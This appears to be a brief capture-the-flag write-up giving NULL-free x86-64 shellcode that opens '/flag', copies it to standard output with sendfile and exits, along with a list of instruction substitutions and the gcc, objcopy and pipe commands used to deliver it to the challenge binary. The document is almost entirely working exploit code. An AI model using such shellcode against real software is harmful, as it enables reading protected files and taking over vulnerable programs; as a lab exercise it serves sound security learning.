Skip to content

NULL-free Shellcode

Changes to prev code:

  1. mov rbx, 0x00000067616c662f -> mov ebx, 0x67616c66; shl rbx, 8; mov bl, 0x2f
  2. mov rax, 2 -> xor rax, rax; mov al, 2
  3. mov rsi, 0 -> xor rsi, rsi
  4. mov rdi, 1 -> xor rdi, rdi; inc rdi
  5. mov rdx, 0 -> xor rdx, rdx
  6. mov r10, 1000 -> xor r10, r10; add r10w, 0x3e8
  7. mov rax, 40 -> xor rax, rax; mov al, 40
  8. mov rax, 60 -> xor rax, rax; mov al, 60

Final shellcode.s:

.global _start
_start:
.intel_syntax noprefix
    mov ebx, 0x67616c66
    shl rbx, 8
    mov bl, 0x2f
    push rbx
    xor rax, rax
    mov al, 2
    mov rdi, rsp
    xor rsi, rsi
    syscall
    xor rdi, rdi
    inc rdi
    mov rsi, rax
    xor rdx, rdx
    xor r10, r10
    add r10w, 0x3e8
    xor rax, rax
    mov al, 40
    syscall
    xor rax, rax
    mov al, 60
    syscall

gcc -nostdlib -static shellcode.s -o shellcode-elf
objcopy --dump-section .text=shellcode-raw shellcode-elf
cat shellcode-raw | /challenge/binary-exploitation-null-free-shellcode